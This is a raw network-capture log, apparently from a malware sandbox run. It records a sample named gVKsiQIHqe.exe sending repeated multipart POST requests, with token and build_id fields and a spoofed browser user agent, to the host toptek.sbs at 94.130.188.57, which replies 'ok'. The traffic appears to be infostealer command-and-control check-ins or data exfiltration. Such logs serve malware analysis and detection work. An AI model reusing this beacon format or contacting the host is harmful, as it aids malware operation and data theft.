2024-12-23 05:58:40 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.5 | 50041 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:41 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----4EK6XT2N7YCBAIEK6XT0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1841
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:41 UTC | 1841 | OUT | Data Ascii: ------4EK6XT2N7YCBAIEK6XT0Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------4EK6XT2N7YCBAIEK6XT0Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------4EK6XT2N7YCBAIEK6XT0Cont
2024-12-23 05:58:42 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:42 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.5 | 50042 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:42 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----VKNG4E3OZMOZUAAASJ5P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:42 UTC | 1825 | OUT | Data Ascii: ------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------VKNG4E3OZMOZUAAASJ5PCont
2024-12-23 05:58:43 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:43 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.5 | 50048 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:44 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----58GD2V3OZMO8YMOZCJ5X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:44 UTC | 1825 | OUT | Data Ascii: ------58GD2V3OZMO8YMOZCJ5XContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------58GD2V3OZMO8YMOZCJ5XContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------58GD2V3OZMO8YMOZCJ5XCont
2024-12-23 05:58:45 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:45 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.5 | 50051 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:45 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----YUAI5X4W47GV3EUS0HDT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:45 UTC | 1825 | OUT | Data Ascii: ------YUAI5X4W47GV3EUS0HDTContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------YUAI5X4W47GV3EUS0HDTContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------YUAI5X4W47GV3EUS0HDTCont
2024-12-23 05:58:46 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:58:46 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.5 | 50056 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:47 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FU3OPHVSJEKF37QQIMGV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:47 UTC | 1825 | OUT | Data Ascii: ------FU3OPHVSJEKF37QQIMGVContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------FU3OPHVSJEKF37QQIMGVContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------FU3OPHVSJEKF37QQIMGVCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:48 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:58:48 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.5 | 50061 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:48 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----3EKNYUKXBA1NYU3OPHVS
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:58:48 UTC | 1841 | OUT | Data Ascii: ------3EKNYUKXBA1NYU3OPHVSContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------3EKNYUKXBA1NYU3OPHVSContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------3EKNYUKXBA1NYU3OPHVSCont
2024-12-23 05:58:49 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:49 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:58:49 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.5 | 50068 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:50 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----G47GDB16FUSRIMOPZCBI
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:58:50 UTC | 1841 | OUT | Data Ascii: ------G47GDB16FUSRIMOPZCBIContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------G47GDB16FUSRIMOPZCBIContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------G47GDB16FUSRIMOPZCBICont
2024-12-23 05:58:51 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:51 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:58:51 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.5 | 50069 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:51 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----G47GDB16FUSRIMOPZCBI
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:58:51 UTC | 1841 | OUT | Data Ascii: ------G47GDB16FUSRIMOPZCBIContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------G47GDB16FUSRIMOPZCBIContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------G47GDB16FUSRIMOPZCBICont
2024-12-23 05:58:52 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:52 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:58:52 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.5 | 50075 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:53 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----RQQ9RQIEU37QQQIWT2NG
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:58:53 UTC | 1841 | OUT | Data Ascii: ------RQQ9RQIEU37QQQIWT2NGContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------RQQ9RQIEU37QQQIWT2NGContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------RQQ9RQIEU37QQQIWT2NGCont
2024-12-23 05:58:54 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:54 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:58:54 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.5 | 50081 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:54 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----VAS26F37QIEUAAI5FUAS
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1829
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:58:54 UTC  1829  OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------VAS26F37QIEUAAI5FUASContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------VAS26F37QIEUAAI5FUASContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------VAS26F37QIEUAAI5FUASCont
2024-12-23 05:58:55 UTC  158  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:55 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:58:55 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
73          192.168.2.5  50088        94.130.188.57   443               5564  C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-23 05:58:56 UTC  323                OUT        POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----6XLX4OZU37QQQQ1DJM7Q
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1829
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:58:56 UTC  1829  OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------6XLX4OZU37QQQQ1DJM7QContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6XLX4OZU37QQQQ1DJM7QContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6XLX4OZU37QQQQ1DJM7QCont
2024-12-23 05:58:57 UTC  158  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:57 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:58:57 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
74          192.168.2.5  50089        94.130.188.57   443               5564  C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-23 05:58:57 UTC  323                OUT        POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----8Y5FK6F37QIE37Q1NGL6
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:58:57 UTC  1825  OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------8Y5FK6F37QIE37Q1NGL6Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------8Y5FK6F37QIE37Q1NGL6Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------8Y5FK6F37QIE37Q1NGL6Cont
2024-12-23 05:58:58 UTC  158  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:58 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:58:58 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
75          192.168.2.5  50095        94.130.188.57   443               5564  C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-23 05:58:59 UTC  323                OUT        POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----6PH4O89RQIEU37YMYCJ5
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1829
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:58:59 UTC  1829  OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------6PH4O89RQIEU37YMYCJ5Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6PH4O89RQIEU37YMYCJ5Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6PH4O89RQIEU37YMYCJ5Cont
2024-12-23 05:59:00 UTC  158  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:00 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:59:00 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
76          192.168.2.5  50098        94.130.188.57   443               5564  C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-23 05:59:00 UTC  323                OUT        POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----6PH4O89RQIEU37YMYCJ5
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:59:00 UTC | 1825 | OUT | Data Ascii: ------6PH4O89RQIEU37YMYCJ5Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6PH4O89RQIEU37YMYCJ5Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6PH4O89RQIEU37YMYCJ5Cont
2024-12-23 05:59:01 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:59:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:59:01 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.5 | 50105 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:59:02 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----I5XL6XLN7QIM7Q1D2NGD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:59:02 UTC | 1825 | OUT | Data Ascii: ------I5XL6XLN7QIM7Q1D2NGDContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------I5XL6XLN7QIM7Q1D2NGDContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------I5XL6XLN7QIM7Q1D2NGDCont
2024-12-23 05:59:03 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:59:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:59:03 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.5 | 50110 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:59:03 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBAI5X4OZU3EUASRQ16P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1841
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:59:03 UTC | 1841 | OUT | Data Ascii: ------DBAI5X4OZU3EUASRQ16PContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------DBAI5X4OZU3EUASRQ16PContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------DBAI5X4OZU3EUASRQ16PCont
2024-12-23 05:59:05 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:59:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:59:05 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.5 | 50116 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:59:06 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----PHLXTJ5XBIEU3EU3W4W4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1841
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:59:06 UTC | 1841 | OUT | Data Ascii: ------PHLXTJ5XBIEU3EU3W4W4Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------PHLXTJ5XBIEU3EU3W4W4Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------PHLXTJ5XBIEU3EU3W4W4Cont
2024-12-23 05:59:07 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:59:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:59:07 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.5 | 50118 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:59:07 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----PHLXTJ5XBIEU3EU3W4W4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1841
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:59:07 UTC | 1841 | OUT | Data Ascii: ------PHLXTJ5XBIEU3EU3W4W4Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------PHLXTJ5XBIEU3EU3W4W4Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------PHLXTJ5XBIEU3EU3W4W4Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:07 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:59:08 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.5 | 50123 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:59:09 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----58GVKXT2VAAIEUSR1VAA
